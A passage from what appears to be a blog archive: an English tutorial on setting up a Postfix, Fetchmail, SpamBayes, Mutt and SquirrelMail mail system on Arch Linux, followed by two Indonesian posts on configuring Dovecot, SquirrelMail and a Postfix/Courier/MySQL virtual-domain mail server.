sending mail through an intermediary as you may need to do if you have
a domain name pointing to a dynamic IP address.)
* Cyrus SASL 2.1.21
SASL authentication daemon.
* Procmail 3.22
Highly configurable auto mail processing.
* Fetchmail 6.25
A remote-mail retrieval utility.
* SpamBayes 1.1a1
a Bayesian anti-spam filter, initially based on the work of Paul Graham.
The major difference between this and other, similar projects is the
emphasis on testing newer approaches to scoring messages.
* Mutt 1.4.2.1
A small but very powerful text-based mail client
* Courier-imap 4.0.4
IMAP / POP3 Server
* Courier-authlib 0.57
Authentication library for the courier mailserver.
* SquirrelMail cvs 1.5.1
For checking mail via the web.
(requires imap-server, perl, and php)
* Pop-before-smtp 1.38
A simple daemon written in Perl, to allow email relay control based on
successful POP or IMAP logins.

Installing Postfix

A note for those with dynamic IP addresses: Before installing Postfix we must first consider if it will need to make use of Simple Authentication and Security Layer (SASL). If you have a dynamic IP address and are using a service like dyndns.org you will need to have Postfix send your mail through your ISP's mail server (with authentication) making use of SASL for the connection. This is because many domains that you will send email to will recognize your hostname as pointing to a dynamic IP address and send the mail back. Check if your distributions Postfix package was built with SASL support or if you are compiling Postfix from scratch add SASL with a ./configure option.

If you've determined you do not need SASL support in postfix:
$ pacman -Sy postfix

If you do need SASL support we need to install cyrus-sasl and use the Arch Build System (abs) utility for building Postfix. Follow the instructions bellow or follow these Arch Wiki instructions: http://wiki.archlinux.org/index.php/PostFix_Howto_With_SASL
$ pacman -Sy cyrus-sasl
$ abs
$ cd /var/abs
$ mkdir -p local/postfix
$ cp -v extra/daemons/postfix/* local/postfix

Now edit /var/abs/local/postfix/PKGBUILD. Under the build() section change:
make OPT="${CFLAGS}" || return 1

to:

make OPT="${CFLAGS}" \
CCARGS="-DUSE_SASL_AUTH -I/usr/include/sasl/" \
AUXLIBS="-L/usr/lib/sasl2 -lsasl2" || return 1

Now run:
$ makepkg
$ pacman -A postfix-*.pkg.tar.gz

I like to then copy the package into a directory under /var/lib/pacman so I have access to all of my abs built packages later:
$ mkdir /var/lib/pacman/abs_built
$ cp postfix-*.pkg.tar.gz /var/lib/pacman/abs_built
Installing Fetchmail
$ pacman -S fetchmail
Installing Procmail
$ pacman -S procmail
Installing SpamBayes

SpamBayes is not yet in the pacman repository. Download it, extract, and install (substitute version numbers with most current):

$ wget http://dl.sourceforge.net/sourceforge\
/spambayes/spambayes-1.1a1.tar.gz
$ tar zxvf spambayes-1.1a1.tar.gz
$ cd spambayes-1.1a1
$ python setup.py install

Installing Mutt
$ pacman -S mutt
Installing courier-imap and courier-authlib

SquirrelMail as well as other mail clients (evolution, outlook, cell phone, etc.) will use this to connect to the mail box. Courier-imap also depends on courier-authlib, so this command will install that as well.
$ pacman -S courier-imap
Installing SquirrelMail
$ pacman -S squirrelmail
Installing pop-before-smtp

You are going to want to consider using Postfix/TLS or pop-before-smtp if you are interested in users connected via IMAP being able to send mail (using your mail server as a SMTP relay). I recommend using Postfix/TLS but will not cover how to install/configure it in this document.

Pop-before-smtp is not in pacman repositories. Substitute version numbers with the most current.
$ wget http://dl.sourceforge.net/sourceforge/popbsmtp/pop-before-smtp-1.38.tar.gz
$ tar zxvf pop-before-smtp-*.tar.gz
$ cd pop-before-smtp-*

Read the README in this directory and then read README.QUICKSTART in the contrib directory for where to copy the necessary files to.

Postfix Configuration

main.cf

Now change to the '/etc/postfix' directory and open up main.cf for editing.

The domain name for my machine is through dyndns.org. Set your myhostname and my domain to something like this:
myhostname = example.com mydomain = example.com

Next we are going to want to set Postfix up for using qmail-style delivery with Maildir (where each email is stored in its own file). This is for courier-imap which SquirrelMail will be using to access the mail and will have other advantages. Don't forget the ending forward slash.
home_mailbox = Maildir/

Set it up so that incoming mail is sent through procmail and so we can alias names/users to mailboxes.
mailbox_command = /usr/bin/procmail -a "$DOMAIN"

alias_maps = hash:/etc/postfix/aliases

If you have a dynamic IP or have trouble with mail being returned from large ISP's or mail systems you are going to have to take a few extra steps. We will set it up so that mail will go through a relay host. In this example I will use my ISP's (SBC) smtp server as an example. Make these additional changes to main.cf
relayhost = [smtp.sbcglobal.yahoo.com]

# authentication for sbc yahoo
smtp_sasl_auth_enable = yes
smtp_sasl_security_options = noanonymous
smtp_sasl_password_maps = hash:/etc/postfix/sasl_passwd

That wraps up our changes to main.cf. We just need to create the hash aliases databases that we defined above. Add these lines to the top of /etc/postfix/aliases (replacing hypexr with your user account of course):

root: hypexr

spam: hypexr
ham: hypexr

Generate the database. From /etc/postfix dir:

$ postalias aliases

Set up smtp server and authentication for SBC mail relay. sasl_passwd:

smtp.sbc.mail.yahoo4.akadns.net my_username@sbcglobal.net:my_passw

Note: Server name can change from time to time. There is a CNAME that points to this name but CNAMEs do not work here.

Generate the database:

$ ./postmap sasl_passwd

Start the postfix server and we are done with postfix!!!!

$ /etc/rc.d/postfix start

Having problems getting it to start? Check out the Postfix log file usually in /var/log/mail or /var/log/maillog.

Fetchmail Configuration

We are going to run our fetchmail daemon from user root. So create the file /root/.fetchmailrc:

set postmaster "postmaster"
set bouncemail
set no spambounce
set properties ""
set daemon 60
poll pop.example.com with proto POP3
user 'user_name' there with password 'my_password' is 'local_user_to_deliver_to' here options flush
poll pop.gmail.com with proto POP3 port 995
user 'my_gmail_un@gmail.com' there with ssl with password 'my_password' is 'hypexr' here options keep

This tells fetchmail to check every minute for mail at pop.mypop.com and also at my gmail account. The flush option at the end of the mypop entry tells it to remove the mail after it is downloaded. I do not want the mail removed from my Gmail account so I use the keep option. Google also uses ssl, hence the "with ssl". Fetchmail comes with its configuration utility fetchmailconf which makes setting up your .fetchmailrc file easy.

I don't believe that Arch Linux has a rc script for fetchmail. The one that I made (/etc/rc.d/fetchmail) looks like this (stat_busy, stat_fail, stat_done are specific to Arch Linux. You could take these out):

#!/bin/sh

. /etc/rc.conf
. /etc/rc.d/functions

DAEMON_NAME="fetchmail"
DAEMON_CONF="/root/.fetchmailrc"
DAEMON_PATH="/usr/bin/fetchmail"

PID=`pidof -o %PPID ${DAEMON_NAME}`

case "$1" in
start)
stat_busy "Starting ${DAEMON_NAME}"
[ -z "$PID" ] && ${DAEMON_PATH} -f ${DAEMON_CONF} -d 60 &> /dev/null
if [ $? -gt 0 ]; then
stat_fail
else
add_daemon ${DAEMON_NAME}
stat_done
fi
;;
stop)
stat_busy "Stopping ${DAEMON_NAME}"
[ ! -z "$PID" ] && kill "$PID" &> /dev/null
if [ $? -gt 0 ]; then
stat_fail
else
rm_daemon ${DAEMON_NAME}
stat_done
fi
;;
restart)
# calling 'stop' and 'start' without the $0 fails...
$0 stop
sleep 3
$0 start
;;
*)
echo "usage: $0 {start|stop|restart}"
esac
exit 0

And start the fetchmail daemon:

$ /etc/rc.d/fetchmail start

Or if you don't want to create/modify an rc script you can start the fetchmail daemon like:

$ /usr/bin/fetchmail -d 60

Spambayes and Procmail Configuration

We are going to be using Spambayes to train and determine if mail is spam and Procmail to sort the mail into folders when they enter our mail system. These two go together as far as Procmail is going to use Spambayes to help sort the mail.

I had used SpamAssassin for a year and had not been very happy with its performance. I have only been using Spambayes for a few weeks and have been pleasantly surprised by how well it has worked and how quickly it adapts. In fairness I had been training SpamAssassin on all of my spam, the spam it had caught and the spam it had missed as well. It was also an older version and I was not using all of the features. With that being said if you are curious give it a try. Many other excellent programs exist. A quick search on Google will turn them up.

When Spambayes is installed it is going to move several files that start with sb_ into your /usr/bin directory. We are going to be interested in sb_mboxtrain.py and sb_filter.py. The former trains the spam filter and the later classifies incoming spam. There are two methods I tried for the initial training:

1. Since I already had thousand of spam and ham (non spam) messages saved up I first tried initially training on this older mail. The results were okay but it was miss sorting mail. These problems would have sorted them selves out with the continued training of the misclassified mail but it would have also took a little while because the database had already been trained so much.
2. The second method I used was extremely effective. I started out with no training on initial messages. I simply let Spambayes work with no information. I then sent the spam and ham messages that ended up in the wrong mailbox to a designated folder. I then run the Spambayes training program on these miss classified messages.

The results from the second method have been amazing. Without even having to manually classify very many messages Spambayes has been performing at superior levels. Check out Spambayes Wiki for many other training methods. I will discuss easy methods of sorting miss classifications in the Mutt and Squirrel Mail sections.

Spam System Initial Setup

We are going to want Maildir folders to hold our regular mail, mail classified as spam, mail classified as unsure, missed spam, and missed ham.

If the standard Maildir directory (~/Maildir) doesn't already exist lets create it with the necessary sub directories to make it a mail box. Run these commands from your user account who will be receiving the mail.
$ mkdir ~/Maildir
$ mkdir ~/Maildir/{new,cur,tmp}

And now the other 4 directories that we are going to use for dealing with spam (Making the directories hidden is going to be done for integration with Squirrelmail):
$ mkdir ~/Maildir/{.MissedSpam,.MissedHam,.CaughtSpam,.Unsure}
$ mkdir ~/Maildir/.MissedSpam/{new,cur,tmp}
$ mkdir ~/Maildir/.MissedHam/{new,cur,tmp}
$ mkdir ~/Maildir/.CaughtSpam/{new,cur,tmp}
$ mkdir ~/Maildir/.Unsure/{new,cur,tmp}

The messages that we are going to be training as spam are going to be in ~/Maildir/.MissedSpam and ham will be in ~/Maildir/.MissedHam. Lets create the script and cron job that will take care of training the Spambayes db. Create a file ~/Maildir/train_spambayes and add this:

#!/bin/sh
# Script to copy mail missed spam and ham into correct folders
# and run sb_mboxtrain.py to train spambayes
# Training will be done only on missed spam and ham

# Files we saved or bounced may be in the new directory
# We want them in cur for training
mv /home/hypexr/Maildir/.MissedSpam/new/* \
/home/hypexr/Maildir/.MissedSpam/cur 2>/dev/null
mv /home/hypexr/Maildir/.MissedHam/new/* \
/home/hypexr/Maildir/.MissedHam/cur 2>/dev/null
/usr/bin/sb_mboxtrain.py -d /home/hypexr/.hammie.db \
-g /home/hypexr/Maildir/.MissedHam \
-s /home/hypexr/Maildir/.MissedSpam

Make the script executable:
$ chmod +x ~/Maildir/train_spambayes

Set up our database that will be consulted for new email and trained on new spam/ham:
$ /usr/bin/sb_filter.py -d $HOME/.hammie.db -n

You will want cron installed so that it can launch the script above, which trains Spambayes, every night at 3:21 am. Edit your cron jobs with the command crontab -e and add:
21 3 * * * ~/Maildir/train_spambayes
Procmail Configuration for Spambayes

These are basic procmail recipes that will sort the spam from ham. From Spambayes on Unix or Linux. Add these lines to your mail recipient's ~/.procmailrc:

SHELL=/bin/sh
MAILDIR=$HOME/Maildir
DEFAULT=$HOME/Maildir/
CAUGHT_SPAM=$MAILDIR/CaughtSpam/
UNSURE=$MAILDIR/Unsure/

#Spambayes process
:0fw:hamlock
| /usr/bin/sb_filter.py -d /home/hypexr/.hammie.db

:0
* ^X-Spambayes-Classification: spam
${CAUGHT_SPAM}

:0
* ^X-Spambayes-Classification: unsure
${UNSURE}

# Catches everything else.
# Anything left over goes into the DEFAULT folder
:0:
${DEFAULT}

So incoming mail is not filtered through procmail's rules where Spambayes's sb_filter decides whether it is spam or ham. The mail is now sitting in the correct directories and ready to be accessed by whatever reader/front-end you would like. Next I going to describe setting up Mutt and SquirrelMail for viewing your mail. Mutt will be the most powerful option combining speed and sleekness but SquirrelMail will be able to match functionality.

Mutt Configuration

First we need to set the MAIL variable so that Mutt will know where to look for your mail. In your ~/.bashrc (create if does not exist) add the line:

MAIL='~/Maildir'

Exit out of your shell and log back in so that the variable will be set or run export MAIL='~/Maildir'. On some systems mutt will not use $MAIL to determine the location of your mail box. When trying to start mutt if it reports a message that no mail directory exists you can try setting the MAILDIR variable or just create the directory that it wants to use and make it a valid Maildir: mkdir -p ~/.maildir/{cur,new,tmp} where .maildir is the folder that mutt wants to use. If you use a directory other than ~/Maildir remember to substitute that wherever I reference Maildir in this document.

Now for the fun part. Lets make everything look pretty and integrated in Mutt. If you start up Mutt right now you will see any mail that your system has received since you have completed the steps above. If no mail shows up in Mutt and there should be mail you need to first check if Spambayes has filtered it into your .Unsure or .CaughtSpam directories. Type 'c' to change directories and enter ~/Maildir/Unsure and check out the mail thats been classified as spam: 'c' ~/Maildir/CaughtSpam. If you still have not found the mail that you are expecting to have received make sure that you have configured Postfix, Fetchmail, and Procmail correctly. Also, try sending mail directly to your_user_accunt@example.com and see if it shows up in one of the directories above.

Now mail is flowing into your system and we can check how Spambayes has classified it by checking the different mail folders. The miss classified mail just needs to be moved into the correct folders for the training.
To manually move the misclassified spam mail:

1. From you Maildir inbox tag each message that has arrived that is spam. Do this by pressing 't' and an asterisk will appear by the messages. After all of the messages have been tagged, press '; m' and enter ~/Maildir/MissedSpam and the spam messages in your inbox will be moved to the MissedSpam mailbox for training by spambayes.
2. When looking at the mail that it has classified as spam in '~/Maildir/CaughtSpam', tag all of the messages it considered spam that were ham and press '; C' and enter ~/Maildir/MissedHam. Now tag them again and press '; m' and enter ~/Maildir to move them into your inbox, where they should have been placed in the first place.

Of course all of this manual stuff is a huge pain so lets automate all of it in .muttrc.

.muttrc Configuration

This .muttrc file is going to save you a quazillion.. thats right a quiazalliona hours in productivity in dealing with our current setup. Here it is:

# Emacs is my editor of choice. I have mostly read that people like
# using emacs-client here and using an emacs server so that the
# editing opens up in an existing emacs session but I prefer
# loading up a fresh instance. The default editor is some 'vi'
set editor="emacs"

# Setting these macros is going to save us all of that time I was
# talking about. Now instead of having to type all of those
# characters to move the mail around we will can just tag the messages
# and, for the instance of spam in your inbox, hit 'S'.

# Move mail to correct directories
macro index S ";s~/Maildir/.MissedSpam\r\r$\r"
macro pager S ";s~/Maildir/.MissedSpam\r\r$\r"
macro index H ";C~/Maildir/.MissedHam\r\r;s~/Maildir\r\r$\r"
macro pager H ";C~/Maildir/.MissedHam\r\r;s~/Maildir\r\r$\r"
macro index M ";s~/Maildir/\r"
macro pager M ";s~/Maildir/\r"

# This one lets me quickly move job search related emails to the
# correct directory. Want to give me a job? :)
macro index B ";s~/Maildir/.Job\r\r$\r"
macro pager B ";s~/Maildir/.Job\r\r$\r

# This is how we are going to move around to the different
# mailboxes. Hitting 'alt-1' will take us to our inbox
# 'alt-2' and we are looking at the mail Spambayes classified
# as spam. etc.
# The extra mailboxes I have in here are for mailing lists I am on.
# I will show the procmail recipe that automatically puts
# the mailing list mail into its correct mailbox further down.

# Move to mailboxes quickly
macro index 1 "c~/Maildir\r"
macro pager 1 "c~/Maildir\r"
macro index 2 "c~/Maildir/.CaughtSpam\r"
macro pager 2 "c~/Maildir/.CaughtSpam\r"
macro index 3 "c~/Maildir/.Unsure\r"
macro pager 3 "c~/Maildir/.Unsure\r"
macro index 4 "c~/Maildir/.Tur\r"
macro pager 4 "c~/Maildir/.Tur\r"
macro index 5 "c~/Maildir/.Sbayes\r"
macro pager 5 "c~/Maildir/.Sbayes\r"
macro index 6 "c~/Maildir/.Wikka\r"
macro pager 6 "c~/Maildir/.Wikka\r"
# Training Maildirs for Spam and Ham
macro index 8 "c~/Maildir/.MissedSpam\r"
macro pager 8 "c~/Maildir/.MissedSpam\r"
macro index 9 "c~/Maildir/.MissedHam\r"
macro pager 9 "c~/Maildir/.MissedHam\r"
# Job E-mails
macro index 0 "c~/Maildir/.Job\r"
macro pager 0 "c~/Maildir/.Job\r"

# Setting these colors makes it easy to tell which emails
# Spambayes has missed.
# Turn spam red and unsure green
color index red default "~h '^X-Spambayes-Classification: spam'"
color index green default "~h '^X-Spambayes-Classification: unsure'"
# Turn gmail mail brightblue
# (My regular expression is not correct here. I think that it
# is looking anywhere in the header for my gmail address
# instead of what I wanted.. Just in the 'To:'.
# It still works for the most part)
color index brightblue default "~h '(^)*my_name@gmail.com'

# Lets set more colors to make things look beautiful. Judging by
# my title for this section I must have had bad feelings towards
# colors when I added this.
#Color crap
color index brightwhite default ~N # color for new messages
color status black yellow
color attachment brightyellow default # file attachments
color search brightred default # search matches
color quoted brightyellow default # quoted text in replies
color quoted1 magenta default # quoted text in replies
color body cyan default "((ftp|http|https)://|news:)[^ >)\"\t]+" # URLs
color body cyan default "[-a-z_0-9.+]+@[-a-z_0-9.]+" # email

# The rest of this stuff is pretty important for functionality and
# readability.

# Don't ask to move read message
set move=no

# My signature is in this file
set signature="~/.signature"

# Change mail to look like from scott@hypexr.org
# Stick your email address here.
my_hdr From: Scott Rippee

# Header control h displays header when in pager
# I want to only see the unignored by default
ignore * # weed out all headers
unignored date from: to cc subject organization # now show me these...

# Thanks to many people whom have written the documents and posts that I
# have gotten these settings from.

New Mutt Commands

Here are the most useful (as far as dealing with spam) commands that we can now use in mutt:

t Tag messages to be manipulated
S Send message/s to spam training folder
H Send message/s to ham training folder and to inbox
alt-1 Change mailbox to Maildir/ (inbox)
alt-2 Change mailbox to .CaughtSpam
alt-3 Change mailbox to .Unsure
alt-8 Change mailbox to .MissedSpam
alt-9 Change mailbox to .MissedHam

So for example, if a couple of spam messages show up in your inbox you can now tag them and hit 'S' (remember its uppercase s) and have them vanished into .MissedSpam for training.

SquirrelMail Configuration

To configure SquirrelMail go into your html_base_directory/squirrelmail/config and run ./conf.pl. Edit the options to fit your needs. If you want to test your config cruise over to http://localhost/squirrelmail/src/configtest.php.

Now go to http://localhost/squirrelmail/ and login using your user account. If you have any email in your in box you should see it after you log in. Now click on the Folders option that is along the top, select all of the mailbox folders that we created earlier (they are listed here because we prefixed them with a period), and click on subscribe. Hit refresh and the mailboxes should be listed in the side panel. Now you can use SquirrelMail for almost all of you mail needs including tagging messages and moving them to the correct folders for Spambayes training and checking on the mail that Spambayes has classified as spam and unsure. The only functionality from our mutt setup that can't be duplicated in SquirrelMail is copying missed ham into its training folder and then moving it into your inbox. This is due to the lack of copying ability. So you will have to go into the ham training folder to see some of the mail that should be in your inbox.

!!! IMPORTANT SECURITY NOTE!!! - Using SquirrelMail like this is not secure! Sending the plain text passwords that you use for your Unix account can be accessed by by a 3rd party, which would them access to your account. You should set up a secure server with SSL and have Courier-imap use passwords that differ from the users system password using Courier Authlib, which I will demonstrate in the next session. Excellent documents exist all over the net for setting up your web server with ssl.

Courier Authentication

Now is a good time to address a bit of essential security. As of now when a user connects via the SquirrelMail or IMAP interface the passwords are being sent in plain text and if these are sniffed that users system account is compromised. Without adding secure connections we can minimize the threat by using alternate passwords for imap connections. The snoop would then have access to your mail, but not be able to log in to the system.

Edit your authdaemonrc file. If your on Arch Linux this will be in /etc/authlib. Under authmodulelist I commented out:

authmodulelist="authpam authpwd authuserdb authshadow ..."

And replaced it with:

authmodulelist="authuserdb"

I believe that adding authuserdb to the front of the list may work, but I am only using this method of authentication so it is all I need in my list.

Lets create the user account entry:

$ userdb "some_user_name" set home=/home/user_dir \
mail=/home/user_dir/Maildir \
uid=users_userid gid=users_groupid

$ userdbpw | userdb "some_user_name" set systempw

You will now be prompted for this pseudo users new password. Next make sure that /etc/authlib/userdb has read/write/execute access for the owner. If not chmod 700 /usr/authlib/userdb. Now create the user database that courier is going to look to for authentication:

$ makeuserdb

Again look to using Postfix/TLS for a tunneling the connection through a secure connection.

Pop-before-smtp Configuration

To successfully configure pop-before-smtp follow the straight forward instructions in contrib/README.QUICKINSTALL. When you are done and everything is working it is important to make sure that you have not some how made your mail server an open relay! This would cause your mail server to be flooded with traffic and be put on the open relay ban lists.

!!! IMPORTANT SECURITY NOTE!!! - I will not use the pop-before-smtp method because it involves sending a password over an insecure connection. Use Postfix through a SSL connection, Postfix/TLS, to accomplish this. Since your local machines are likely already allowed to use your Postfix as a mail relay the only time that you would be using this method is from a non-trusted server where you password can be sniffed. If you still choose to use this method make sure that you have changed the users courier password as described in Courier Authentication.

Additional Simple Procmail Recipes and Mailbox Config

If you are a member of any news letters/mailing lists you can have them automatically sorted to their own mailbox using Procmail. First create the new mail directory in your ~/Maildir directory. Lets call it .Sbayes and pretend that we are on the Spambayes mailing list. So exactly as before with the spam related mailboxes:

mkdir -p ~/Maildir/.Sbayes/{cur,new,tmp}

Now add this new rule to your ~/.procmailrc:

# spambayes-dev@python.org mailing list
:0
* ^X-BeenThere: spambayes@python.org
${MAILDIR}/.Sbayes/

In the .mutrc example above it shows an example of setting alt-5 as the macro to see your Spambayes emails.

A slightly different method can be used to send spam and ham for training. Adding the following lines will allow you to bounce spam messages to spam@localhost (localhost or your mail_domain.com) and ham messages to ham@localhost:

# Mail has been bounced to spam@localhost
:0
* ^Resent-To:.*spam
${MAILDIR}/.MissedSpam

# Mail has been bounced to ham@localhost
:0
* ^Resent-To:.*ham
${MAILDIR}/.MissedHam

If you want to bounce messages to the spam and ham addresses like this, you will need to make sure that the headers stay intact. Do not try using this or a similar technique for forwarding mails to an address because the email's headers would not be intact and this is a large part of the spam classification. This method works because above we specified spam and ham as aliases for hypexr in the Postfix aliases file.

Conclusion

For Arch Linux users, Add saslauthd authdaemond courier-imap postfix fetchmail to DAEMONS in your /etc/rc.conf file and they will be started automatically when your machine boots. If you are running a web server have the httpd service listed after the services we are adding.

/etc/rc.conf

DAEMONS=(... saslauthd authdaemond postfix courier-imap fetchmail ...)

Enjoy your new mail system and centralized mailbox. If you are handling a large number of users for you email system this is just the tip of the iceberg and you are going to mostly be interested in virtual users, security, and a system wide spam classifier. There are many good documents on various setups to accomplish this, see the links section. If you have any suggestions, questions, comments, or corrections send me an email or drop a note in the forum. If this document has been of any use to you, cheers. :)

Setup Linux menjadi Mail Server

2008-12-22T03:54:00.000+07:00

Yang harus diperlukan dan diinstall pada sistem linux anda, untuk menginstall paket pada distro yang lain silakan merujuk pada distro yang anda pakai :

1. MTA (mail transer Agent )

Mail transfer agent program yang digunakan untuk menerima dan mengirim email dari server anda,, yang digunakan disini adalah Postfix

#apt-get install postfix
2. Mail Filtering

Digunakan untuk memfilter email yang masuk ke Server Mail anda untuk mendeteksi Spam & Virus, namun pada pembahasan kali ini tidak dibahas .. untuk topik advance pembahasan ini akan dibahas :D .
3. Mail Delivery Agent

Agar us bisa mendownload email dari lokasi yang lain kita membutuhkan server IMAP or POP3 disini banyak sekali pilihannya namun pada tutorial ini akan digunakan Dovecot.

#apt-get install dovecot-common dovecot-imapd dovecot-pop3d

Beberapa pilihan untuk IMAP & POP3 :
1. Dovecot
2. Courier
3. Cyrus
4. Webmail Server

Agar Mail Server anda dapat diakses melalui lingkungan Web base anda memerlukan Webmail server berikut pilihannya:

#apt-get install squirrelmail
1. Squirrelmail
2. OpenWebmail

Yang digunakam pada tutorial ini adalah Squirrelmail
5.

WebServer (Lamp = Linux , apache , mysql, php)

Untuk menjalankan Webmail Server anda membutuhkan Lamp sudah terinstalasi dengan baik ,, pada tutorial ini tidak dibahas bagaimana menkonfigurasi Lamp cobaah merujuk ke manual2 yang lain.

Setelah anda berhasil menginstall paket2 yang disebutkan diatas step selanjutnya adalah megkonfigurasi Mail Server anda ….

*

Konfigurasi Dovecot
o

Menentukan Prorokol IMAP & POP3

Edit konfigurasi pada /etc/dovecot/dovecot.conf

tambahkan konfigurasi berikut: protocols = pop3 pop3s imap imaps
o

Memilih Mailboxes

Agar mail disimpan pada home direktory maka kita edit konfigurasi /etc/dovecot/dovecot.conf

rubahlah :

#mail_location = maildir:~/Maildir menjadi mail_location = maildir:~/Maildir (pagarnya dihilangkan)
o

Testing2 dovecot

root@w3hol:/home/rachmat# telnet localhost pop3

Trying 127.0.0.1…

Connected to localhost.

Escape character is ‘^]’.

+OK Dovecot ready.
*

Konfigurasi Alias squeirrelmail pada apache :

karena saya menggunakan apache2 maka edit file konfigurasi /etc/apache/apache2.conf

jika anda menggunakan distro fedora file konfigurasi ada pada /etc/apche/httpd.conf

tambahkan script berikut pada bagian alias :

Alias /webmail “/usr/share/squirrelmail/”

Options Indexes MultiViews

AllowOverride None

Order allow,deny

Allow from all

jika anda menggunakan distro fedora anda tidak perlu mengkonfigurasi konfigurasi ini karena anda bisa langsung mengaksesnya dari http://localhost/webmail
*

okey sekarang kita selesai konfigurasi

mari kita restart semua service yang dibutuhkan

#/etc/init.d/apache2 restart untu distro fedora #/etc/init.d/httpd restart

# /etc/init.d/dovecot restart

#/etc/init.d/postfix restart

buka browser … untuk mengakses squirrelmail buka alamat http://localhost/webmail

dan login menggunakan user dan pass sistem linux anda… anda bisa berkirim dan menerima email di jaringan anda…. menggunakan email client seperti thunderbird, evolution dan lain2. untuk bahasa selanjutnya kita akan membahas bagaimana kita bisa mendownload email2 dari internet dan mengirim email kita ke internet menggunakan email server yang telah kita buta.

Installasi mailserver dengan postfix and courier menggunakan authentikasi mysql

2008-12-22T03:52:00.001+07:00

Tutorial ini menjelaskan Step by Step tentang cara membuat mailserver dg virtual domain (domain email tidak harus selalu sama dg domain komputer yang sesungguhnya) denganberbasiskan postfix dan courier dg memanfaatkan mysql sebagai penyimpan data username & password bagi tiap2 user. Berikut ini yang harus anda lakukan.

( INTERNET )—————-| DMZ |—————-( Local Area Networks )

Step 1: Install paket-paket yang diperlukan
Paket yang diperlukan dalam tutorial ini antara lain :
Untuk Mengirim email (SMTP) : postfix (Pilih: “Local only”), postfix-tls, postfix-mysql, postfix-doc
Untuk Database user : mysql-client-5.0, mysql-server-5.0
Untuk menerima email (POP3 & IMAP) : courier-base (Pilih: “No”), courier-authdaemon, courier-authlib-mysql, courier-pop, courier-pop-ssl, courier-imap, courier-imap-ssl
Untuk Keamanan Pengiriman dan Penerimaan email : libsasl2, libsasl2-modules, libsasl2-modules-sql, openssl
Untuk Mencegah Virus dan Spam : amavisd-new, spamassassin, clamav, clamav-daemon, zoo, unzip, lha
Untuk tampilan WebMail : squirrelmail, phpmyadmin
Untuk testing tools : telnet

root@bajoel:~#apt-get install postfix postfix-tls postfix-mysql postfix-doc mysql-client-5.0 mysql-server-5.0 courier-authdaemon courier-authlib-mysql courier-pop courier-pop-ssl courier-imap courier-imap-ssl libsasl2 libsasl2-modules libsasl2-modules-sql openssl amavisd-new spamassassin clamav clamav-daemon zoo unzip lha squirrelmail phpmyadmin telnet

Step 2: Membuat user, database, dan tabel yang diperlukan pada mysql
Tambahkan database dan tabel-tabel baru pada mysql anda sebagai berikut
root@bajoel:~#mysql -u root -p
password:
mysql>CREATE DATABASE mail;
mysql>CREATE USER ‘mailadmin’@'localhost’ identified by ‘passwordanda’;
mysql>USE mail;
mysql>CREATE TABLE domains (
domain varchar(50) NOT NULL,
PRIMARY KEY (domain) )
TYPE=MyISAM;
mysql>CREATE TABLE forwardings (
source varchar(80) NOT NULL,
destination TEXT NOT NULL,
PRIMARY KEY (source) )
TYPE=MyISAM;
mysql>CREATE TABLE users (
email varchar(80) NOT NULL,
password varchar(20) NOT NULL,
PRIMARY KEY (email) )
TYPE=MyISAM;
mysql>GRANT all ON mail.* TO ‘mailadmin’@'localhost’;

Step 3: Membuat file2 baru sebagai penunjuk ke database mysql
Buat file baru dg nama mysql-virtual_domains.cf
root@bajoel:~#touch /etc/postfix/mysql-virtual_domains.cf
isi file mysql-virtual_domains.cf dg baris-baris dibawah ini:
root@bajoel:~#mcedit /etc/postfix/mysql-virtual_domains.cf
user = mailadmin
password = passwordanda
dbname = mail
table = domains
select_field = ‘virtual’
where_field = domain
hosts = 127.0.0.1

Buat file baru dg nama mysql-virtual_forwardings.cf yg berisi :
root@bajoel:~#touch /etc/postfix/mysql-virtual_forwardings.cf
isi file mysql-virtual_forwardings.cf dg baris-baris dibawah ini:
root@bajoel:~#mcedit /etc/postfix/mysql-virtual_forwardings.cf
user = mailadmin
password = passwordanda
dbname = mail
table = forwardings
select_field = destination
where_field = source
hosts = 127.0.0.1

Buat file baru dg nama user mysql-virtual_mailboxes.cf yg berisi :
root@bajoel:~#touch /etc/postfix/mysql-virtual_mailboxes.cf
isi file mysql-virtual_mailboxes.cf dg baris-baris dibawah ini:
root@bajoel:~#mcedit /etc/postfix/mysql-virtual_mailboxes.cf
user = mailadmin
password = passwordanda
dbname = mail
table = users
select_field = CONCAT(SUBSTRING_INDEX(email,’@',-1),’/',SUBSTRING_INDEX(email,’@',1),’/')
where_field = email
hosts = 127.0.0.1

Buat file baru mysql-virtual_email2email.cf yang berisi :
root@bajoel:~#touch /etc/postfix/mysql-virtual_email2email.cf
isi file mysql-virtual_email2email.cf dg baris-baris dibawah ini:
root@bajoel:~#mcedit /etc/postfix/mysql-virtual_email2email.cf
user = mailadmin
password = passwordanda
dbname = mail
table = users
select_field = email
where_field = email
hosts = 127.0.0.1

[Penting] Demi keamanan, pastikan hanya user root & postfix saja yang bisa mengakses file-file yang telah anda buat.
root@bajoel:~#chown root:postfix /etc/postfix/mysql-virtual_*.cf
root@bajoel:~#chmod u=rw,g=r,o= /etc/postfix/mysql-virtual_*.cf

Step 4: Membuat user baru pada system kita sebagai administrator-email
User ini bertugas untuk membuat maildir baru setiap ada user baru yang mendaftar pada mailserver anda
root@bajoel:~#groupadd -g 5000 mail-admin
root@bajoel:~#useradd -g mail-admin -u 5000 mail-admin -d /home/mail -m
root@bajoel:~#mkdir /home/mail
root@bajoel:~#chown -R mail-admin:mail-admin /home/mail
root@bajoel:~#chmod -R u=rwx,g=,o= /home/mail

Step 5: Mengkonfigurasi postfix sbg server SMTP
File main.cf ini adalah file konfigurasi utama dari postfix
root@bajoel:~#mcedit /etc/postfix/main.cf
Editlah file tsb, sehingga menjadi seperti dibawah ini:
inet_interfaces = all
myhostname = mail.domain-anda.org (fqdn)
mydestination = (jangan menuliskan virtual domain disini -> lebih baik dikosongi saja)
mynetworks = lqman.org (nama domain anda)
virtual_alias_domains =
virtual_alias_maps = mysql:/etc/postfix/mysql-virtual_forwardings.cf mysql:/etc/postfix/mysql-virtual_email2email.cf
virtual_mailbox_domains = mysql:/etc/postfix/mysql-virtual_domains.cf
virtual_mailbox_maps = mysql:/etc/postfix/mysql-virtual_mailboxes.cf
virtual_mailbox_base = /home/mail
virtual_uid_maps = static:5000
virtual_gid_maps = static:5000
smtpd_sasl_auth_enable = yes
broken_sasl_auth_clients = yes
smtpd_recipient_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination
smtpd_use_tls = yes
smtpd_tls_cert_file = /etc/postfix/smtpd.cert
smtpd_tls_key_file = /etc/postfix/smtpd.key

Testing…
Restart service postfix, dan cobalah untuk mengakses port 25 dengan telnet
